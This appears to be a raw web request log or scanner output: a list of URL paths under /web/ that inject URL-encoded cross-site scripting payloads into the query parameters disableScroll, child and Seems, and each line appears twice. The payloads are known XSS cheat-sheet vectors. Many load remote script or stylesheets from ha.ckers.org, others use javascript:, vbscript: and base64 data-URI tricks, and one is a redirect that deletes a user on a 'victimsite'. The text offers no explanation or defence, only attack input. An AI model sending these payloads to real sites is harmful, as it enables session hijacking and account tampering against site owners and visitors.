/web/?disableScroll=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E
/web/?disableScroll=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E
/web/?disableScroll=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js
/web/?disableScroll=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2Fwww.gohttp%3A%2F%2Fwww.google.com%2Fogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2Fwww.gohttp%3A%2F%2Fwww.google.com%2Fogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2Fwww.google.com.%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2Fwww.google.com.%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2Fgoogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2Fgoogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2Fha.ckers.org%40google%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2Fha.ckers.org%40google%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E
/web/?disableScroll=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E
/web/?disableScroll=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E
/web/?disableScroll=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E
/web/?disableScroll=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2F0102.0146.0007.00000223%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2F0102.0146.0007.00000223%2F%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CIMG+SRC%3D%22mocha%3A%5Bcode%5D%22%3E
/web/?disableScroll=%3CIMG+SRC%3D%22mocha%3A%5Bcode%5D%22%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E
/web/?disableScroll=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E
/web/?child=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E
/web/?child=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E
/web/?child=%3COBJECT+TYPE%3D%22text%2Fx-scriptlet%22+DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E
/web/?child=%3COBJECT+TYPE%3D%22text%2Fx-scriptlet%22+DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E
/web/?child=%3CLINK+REL%3D%22stylesheet%22+HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
/web/?child=%3CLINK+REL%3D%22stylesheet%22+HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
/web/?child=%3CMETA+HTTP-EQUIV%3D%22Link%22+Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B+REL%3Dstylesheet%22%3E
/web/?child=%3CMETA+HTTP-EQUIV%3D%22Link%22+Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B+REL%3Dstylesheet%22%3E
/web/?child=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/web/?child=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/web/?child=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/web/?child=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/web/?child=%3CSCRIPT+SRC%3D%2F%2Fha.ckers.org%2F.j%3E
/web/?child=%3CSCRIPT+SRC%3D%2F%2Fha.ckers.org%2F.j%3E
/web/?child=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E
/web/?child=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E
/web/?child=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/web/?child=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/web/?child=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser
/web/?child=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser
/web/?child=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
/web/?child=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
/web/?child=%3CIMG+SRC%3D%27vbscript%3Amsgbox%28%22XSS%22%29%27%3E
/web/?child=%3CIMG+SRC%3D%27vbscript%3Amsgbox%28%22XSS%22%29%27%3E
/web/wp-cron.php?doing_wp_cron=1644502491.0010859966278076171875
/web/?child=%3CIFRAME+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C
/web/?child=%3CIFRAME+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C
/web/?child=%3C+%253C+%26lt+%26lt%3B+%26LT+%26LT%3B+%26%2360+%26%23060+%26%230060+%26%2300060+%26%23000060+%26%230000060+%26%2360%3B+%26%23060%3B+%26%230060%3B+%26%2300060%3B+%26%23000060%3B+%26%230000060%3B+%26%23x3c+%26%23x03c+%26%23x003c+%26%23x0003c+%26%23x00003c+%26%23x000003c+%26%23x3c%3B+%26%23x03c%3B+%26%23x003c%3B+%26%23x0003c%3B+%26%23x00003c%3B+%26%23x000003c%3B+%26%23X3c+%26%23X03c+%26%23X003c+%26%23X0003c+%26%23X00003c+%26%23X000003c+%26%23X3c%3B+%26%23X03c%3B+%26%23X003c%3B+%26%23X0003c%3B+%26%23X00003c%3B+%26%23X000003c%3B+%26%23x3C+%26%23x03C+%26%23x003C+%26%23x0003C+%26%23x00003C+%26%23x000003C+%26%23x3C%3B+%26%23x03C%3B+%26%23x003C%3B+%26%23x0003C%3B+%26%23x00003C%3B+%26%23x000003C%3B+%26%23X3C+%26%23X03C+%26%23X003C+%26%23X0003C+%26%23X00003C+%26%23X000003C+%26%23X3C%3B+%26%23X03C%3B+%26%23X003C%3B+%26%23X0003C%3B+%26%23X00003C%3B+%26%23X000003C%3B+%5Cx3c+%5Cx3C+%5Cu003c+%5Cu003C
/web/?child=%3C+%253C+%26lt+%26lt%3B+%26LT+%26LT%3B+%26%2360+%26%23060+%26%230060+%26%2300060+%26%23000060+%26%230000060+%26%2360%3B+%26%23060%3B+%26%230060%3B+%26%2300060%3B+%26%23000060%3B+%26%230000060%3B+%26%23x3c+%26%23x03c+%26%23x003c+%26%23x0003c+%26%23x00003c+%26%23x000003c+%26%23x3c%3B+%26%23x03c%3B+%26%23x003c%3B+%26%23x0003c%3B+%26%23x00003c%3B+%26%23x000003c%3B+%26%23X3c+%26%23X03c+%26%23X003c+%26%23X0003c+%26%23X00003c+%26%23X000003c+%26%23X3c%3B+%26%23X03c%3B+%26%23X003c%3B+%26%23X0003c%3B+%26%23X00003c%3B+%26%23X000003c%3B+%26%23x3C+%26%23x03C+%26%23x003C+%26%23x0003C+%26%23x00003C+%26%23x000003C+%26%23x3C%3B+%26%23x03C%3B+%26%23x003C%3B+%26%23x0003C%3B+%26%23x00003C%3B+%26%23x000003C%3B+%26%23X3C+%26%23X03C+%26%23X003C+%26%23X0003C+%26%23X00003C+%26%23X000003C+%26%23X3C%3B+%26%23X03C%3B+%26%23X003C%3B+%26%23X0003C%3B+%26%23X00003C%3B+%26%23X000003C%3B+%5Cx3c+%5Cx3C+%5Cu003c+%5Cu003C
/web/?child=%3CA+HREF%3D%22h+tt+p%3A%2F%2F6%26%2309%3B6.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22h+tt+p%3A%2F%2F6%26%2309%3B6.000146.0x7.147%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CIMG+SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
/web/?child=%3CIMG+SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E
/web/?child=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22%2F%2Fwww.google.com%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CXML+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxsstest.xml%22+ID%3DI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
/web/?child=%3CXML+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxsstest.xml%22+ID%3DI%3E%3C%2FXML%3E+%3CSPAN+DATASRC%3D%23I+DATAFLD%3DC+DATAFORMATAS%3DHTML%3E%3C%2FSPAN%3E
/web/?child=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E
/web/?child=%3CHTML+xmlns%3Axss%3E+%3C%3Fimport+namespace%3D%22xss%22+implementation%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.htc%22%3E+%3Cxss%3Axss%3EXSS%3C%2Fxss%3Axss%3E+%3C%2FHTML%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2Fgoogle%3Aha.ckers.org%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2Fgoogle%3Aha.ckers.org%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2F1113982867%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2F1113982867%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?child=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D
/web/?child=%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D
/web/?child=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E
/web/?child=%3CIMG+SRC+%3D+%22+j+a+v+a+s+c+r+i+p+t+%3A+a+l+e+r+t+%28+%27+X+S+S+%27+%29+%22+%3E
/web/?child=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js
/web/?child=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js
/web/?child=%3CA+HREF%3D%22http%3A%2F%2Fwww.gohttp%3A%2F%2Fwww.google.com%2Fogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2Fwww.gohttp%3A%2F%2Fwww.google.com%2Fogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2Fwww.google.com.%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2Fwww.google.com.%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2Fgoogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2Fgoogle.com%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2Fha.ckers.org%40google%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2Fha.ckers.org%40google%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22%2F%2Fgoogle%22%3EXSS%3C%2FA%3E
/web/?child=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E
/web/?child=%3CLAYER+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FLAYER%3E
/web/?child=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E
/web/?child=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E
/web/?child=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E
/web/?child=%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Ddata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2F0102.0146.0007.00000223%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2F0102.0146.0007.00000223%2F%22%3EXSS%3C%2FA%3E
/web/?child=%3CIMG+SRC%3D%22mocha%3A%5Bcode%5D%22%3E
/web/?child=%3CIMG+SRC%3D%22mocha%3A%5Bcode%5D%22%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E
/web/?child=%3CA+HREF%3D%22http%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3EXSS%3C%2FA%3E
/web/?Seems=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E
/web/?Seems=%3CSTYLE%3EBODY%7B-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29%7D%3C%2FSTYLE%3E
/web/?Seems=%3COBJECT+TYPE%3D%22text%2Fx-scriptlet%22+DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E
/web/?Seems=%3COBJECT+TYPE%3D%22text%2Fx-scriptlet%22+DATA%3D%22http%3A%2F%2Fha.ckers.org%2Fscriptlet.html%22%3E%3C%2FOBJECT%3E
/web/?Seems=%3CLINK+REL%3D%22stylesheet%22+HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
/web/?Seems=%3CLINK+REL%3D%22stylesheet%22+HREF%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.css%22%3E
/web/?Seems=%3CMETA+HTTP-EQUIV%3D%22Link%22+Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B+REL%3Dstylesheet%22%3E
/web/?Seems=%3CMETA+HTTP-EQUIV%3D%22Link%22+Content%3D%22%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%3E%3B+REL%3Dstylesheet%22%3E
/web/?Seems=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/web/?Seems=%3CSTYLE%3E%40import%27http%3A%2F%2Fha.ckers.org%2Fxss.css%27%3B%3C%2FSTYLE%3E
/web/?Seems=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/web/?Seems=%3CEMBED+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E
/web/?Seems=%3CSCRIPT+SRC%3D%2F%2Fha.ckers.org%2F.j%3E
/web/?Seems=%3CSCRIPT+SRC%3D%2F%2Fha.ckers.org%2F.j%3E
/web/?Seems=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E
/web/?Seems=%3CXSS+STYLE%3D%22behavior%3A+url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%22%3E
/web/?Seems=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/web/?Seems=%3CIMG+SRC%3D%22livescript%3A%5Bcode%5D%22%3E
/web/?Seems=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser
/web/?Seems=Redirect+302+%2Fa.jpg+http%3A%2F%2Fvictimsite.com%2Fadmin.asp%26deleteuser
/web/?Seems=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/web/?Seems=%3CA+HREF%3D%22http%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3EXSS%3C%2FA%3E
/web/?Seems=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
/web/?Seems=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E
